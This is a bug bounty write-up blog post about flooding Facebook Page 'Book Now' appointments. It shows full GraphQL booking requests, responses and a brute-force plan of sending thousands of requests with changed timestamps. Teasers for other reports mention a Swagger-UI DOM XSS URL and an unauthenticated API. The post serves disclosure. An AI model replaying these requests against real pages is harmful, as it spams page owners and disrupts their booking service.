[Facebook] Abusing and Disabling "Book Now"

 This bug was a bypass to a resolved issue which I reported some time ago - [Facebook]Disable Service Appointments

POC -

A hacker could have used missing rate limit in setting up Appointments for a Service created by a Page and hide the legit Appointments.

A request going to -

===============================================

POST/api/graphqlbatch/HTTP/1.1

Host:www.facebook.com

__user=ABCXYZ&__a=1&__dyn=ABCXYZ&__req=x&__be=1&__pc=PHASED:ufi_home_page_pkg&dpr=1&__rev=1000581540&__comet_req=false&fb_dtsg=ABCXYZ&jazoest=22014&__spin_r=1000581540&__spin_b=trunk&__spin_t=1554795186&queries={"o0":{"doc_id":"2204485419589691","query_params":{"input":{"request_owner_id":XXX,"client_mutation_id":0,"actor_id":XXX,"page_id":XXX,"service_id":null,"service_ids":["2155898777850745"],"end_time":1554798600,"start_time":1554796800,"consumer_country_code":null,"consumer_phone_number":null,"appointment_notes":null,"session_id":"ba84af01c639a4ab85a3d3714a3e5583","referrer":"availability_card","referrer_surface":"page"}}}}

===============================================

could be manipulated and repeated to bypass the rate limit in place.

In this request body there are two objects "end_time":1554798600" and "start_time":1554796800" which are unix timestamps for start and end time for the appointments.

By a customised payload list we can automate a bruteforce attack which will make appointment requests with new timings.

Evaluation for rate limiting -

In the POC video sent to the Facebook Security team, I had shown that we are not getting blocked as the response for every request will be "successful_results": 1,.

We can send 4000 requests in just less then 2 minutes and we are not getting silently blocked after 4001th request as the owner of the page is getting the 4001th notification.

The response for every request would be -

===============================================
{"o0":{"data":{"services_external_calendar_save_instant_booking_appointment":{"request":{"id":"2130150507105421"},"error":null}}}}
{
"successful_results": 1,
"error_results": 0,
"skipped_results": 0
}===============================================
The same behaviour could be found in FB4A requests and the responses if followed the same bypass.
The request -

===============================================

POST/graphql HTTP/1.1
Content-Type:application/x-www-form-urlencoded
X-FB-Friendly-Name:SendInstantBookingRequestMutation
Host:graph.facebook.com
doc_id=1552528994814342&method=post&locale=en_US&pretty=false&format=json&purpose=fetch&variables={"0":{"start_time":1554802200,"session_id":"f69c72e4-c68e-4f9f-8154-035bc95b9ffd","client_mutation_id":"984f6399-ec59-43d9-882a-28de0d16d370","actor_id":"XXX","service_ids":["XXX"],"end_time":1554804000,"prior_referrer_surface":null,"page_id":"XXX","referrer":"PRIMARY_CTA","prior_referrer":null,"appointment_notes":"","referrer_surface":"PAGE"}}&fb_api_req_friendly_name=SendInstantBookingRequestMutation&fb_api_caller_class=graphservice&fb_api_analytics_tags=["GraphServices","visitation_id=281710865595635:bc598:2:1554798860.163"]&server_timestamps=true

===============================================

The response -

===============================================

{"data":{"services_external_calendar_save_instant_booking_appointment":{"request":{"id":"2130194283767710"}}},"extensions":{"server_metadata":{"request_start_time_ms":1554799254984,"time_at_flush_ms":1554799256773},"is_final":true}}

===============================================

Timeline -

Reported - Tuesday, April 9, 2019

Triaged - Friday, April 12, 2019

Thursday, June 6, 2019 - Closed - "Due to the limited nature of this issue, we don't feel it has enough of a security impact to be rewarded via the bug bounty program. As previously discussed, there were in fact rate limits in place here."







Popular posts from this blog

[Google] Access to BGP server + DOM XSS

 A hacker could have had the access to a BGP REST API server without any authorisation which was leading to leak of internal network info, devices info, network configuration and modification. Apart from that, there was a DOM XSS vulnerability in the target IP asset as well. POC - An IP address had a BGP server running on it. The access to it was an API service " Sonic Network Management APIs". These API calls could have been made without authorisation(access_token) and they were all listed with specifications on - " https://IP/ui/model.html". Endpoints such as - /ui/model.html?urls.primaryName=sonic-interface.yaml#/sonic-interface/get_sonic_interface_sonic_interface /ui/model.html?urls.primaryName=sonic-port.yaml#/sonic-port/get_sonic_port_sonic_port /ui/model.html?urls.primaryName=openconfig-lldp.yaml#/openconfig-lldp/get_openconfig_lldp_lldp_interfaces /ui/model.html?urls.primaryName=openconfig-platform.yaml#/openconfig-platform/get_openconfig_platform_components
Read more

[Google] YouTube "restconf" Swagger-UI XSS

  During my recon, I came across a few Google owned IP assets which were running "restconfig" services hosted on Swagger-UI. Dawid Moczadło has written a detailed article here . POC - Three IP assets on -  "https://IP/ui" were vulnerable to DOM XSS on this endpoint - "/ui/model.html?configUrl=http://hackingmonks/test.json". The Swagger-UI did show the available API endpoints for the service but had authorisation in place(access_token was needed). During this period, I had found 4th asset which had the same vulnerability along with additional exploitation, which was reported in another ticket. The write-up can be found here ( Access to BGP server + DOM XSS ). Timeline - Reported - 22.05.2023 Triaged - 22.05.2023 The assets were no longer accessible to the public -  09.06.2023 Accepted - 07.06.2023 Rewarded - 13.06.2023 Google's date for the fix - 08.12.2023
Read more

[Google] Disclose hidden Blogger profile Display name and Profile photo

 Because of an unfiltered response to an API call, it was possible for anyone to fetch hidden Blogger Profile Display name and Profile photo. POC - An endpoint going to - ========================================= GET https://blogger.googleapis.com/v3/blogs/target_blog_id/posts?fetchBodies=true&fetchImages=true&maxResults=69&view=VIEW_TYPE_UNSPECIFIED&key=[YOUR_API_KEY] HTTP/1.1 Authorization: Bearer [YOUR_ACCESS_TOKEN] ========================================= Would respond with the hidden Profile Display name and Profile photo as below - ========================================= "author": {     "id": "blogger_id",     "displayName": "blogger_name",     "url": "https://www.blogger.com/profile/blogger_id",     "image": {       "url": "//2.bp.blogspot.com/blogger_photo.jpg" } ========================================= Timeline - Reported - 31.01.2023 Triaged - 01.02.2023 Acc
Read more